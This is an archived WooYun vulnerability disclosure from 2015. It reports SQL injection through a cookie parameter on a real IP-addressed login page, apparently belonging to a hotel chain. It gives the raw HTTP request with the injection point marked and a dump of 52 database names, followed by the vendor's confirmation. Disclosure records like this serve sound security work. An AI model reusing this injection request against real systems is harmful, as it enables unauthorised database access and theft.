乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-28: 细节已通知厂商并且等待厂商处理中 2015-04-30: 厂商已经确认,细节仅向厂商公开 2015-05-10: 细节向核心白帽子及相关领域专家公开 2015-05-20: 细节向普通白帽子公开 2015-05-30: 细节向实习白帽子公开 2015-06-14: 细节向公众公开
。。。。。。。
漏洞网站:http://112.65.142.28/HTlogin.aspx
http信息:
GET /bbs/login.asp HTTP/1.1Cookie: %2Fbbs%2FGROUP=12345*; ASPSESSIONIDCSADCQBR=PEEDCNMBDHPPFKKDLEPKCNKDReferer: http://112.65.142.28:80/bbs/admin_login.aspHost: 112.65.142.28Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
%2Fbbs%2FGROUP 存在漏洞
available databases [52]:[*] Application_Registry_Service_DB_5d9281593cab42dc8320efcf7cbfd7a0[*] Bdc_Service_DB_17fc7e4144144d30bf092d46962cf618[*] configdb[*] dbcenter[*] dnt31[*] eCell6[*] Exam1BAK[*] HT_eProcurement[*] HTFranchisee[*] HtinnsAdviser[*] HTIntranetUAT[*] HTScore[*] InnInspection[*] InspectionAudit150408[*] Managed Metadata Service_eb3ad9498f3c4d538c1c638c92230972[*] master[*] mdm_01[*] model[*] msdb[*] OA[*] PerformancePoint Service Application_1e41da1b1ab64e55b59c496da2baa509[*] PnCheck[*] PurchaseSurvey[*] RCTIDB[*] ReportServer[*] ReportServerTempDB[*] ROOMCHK[*] Search_Service_Application_CrawlStoreDB_a4e0258f3e8d475dbc9ae62b373ce475[*] Search_Service_Application_DB_e90bd9a6f93d43c294e41402b5d631e9[*] Search_Service_Application_PropertyStoreDB_bda79800fee24b8691db0032d6ceccbc[*] Secure_Store_Service_DB_b62005406e8a4f12a854cb5a434821f4[*] SharePoint_AdminContent_5947d722-6796-4bc7-ae44-1c894454c1f5[*] SharePoint_Config[*] slam[*] StateService_23c5611220344b52bea83c8d6fd7ddc8[*] tempdb[*] test[*] User Profile Service Application_ProfileDB_cb8f9f4b3ec14f0ea7f125fe176a4e0f[*] User Profile Service Application_SocialDB_6bd18e2e80804b86bc5687f722d780ab[*] User Profile Service Application_SyncDB_c8c90e3cd266442f83f260c4b75ad735[*] userbase_01[*] userplus_01[*] VHArchives_HanTing[*] WebAnalyticsService应用程序_ReportingDB_7dc7dc51-0f26-49e6-8b74-9187ccdf0186[*] WebAnalyticsService应用程序_StagingDB_458c6a10-f5c4-4756-a2d6-010eb6805b43[*] WordAutomationServices_04a084d97a3d4f83af4b3667b5385333[*] WSS_Content_90[*] WSS_Content_96f786efb4e6401f89115ac108f5f165[*] WSS_Content_afe21b5efe3b45be8411b39b7021ec82[*] WSS_Content_b3117e51d8c8405888a80388555ec208[*] WSS_Logging[*] YunYing
。。。。
危害等级:中
漏洞Rank:5
确认时间:2015-04-30 12:49
已通知相关团队跟进处理,谢谢!
暂无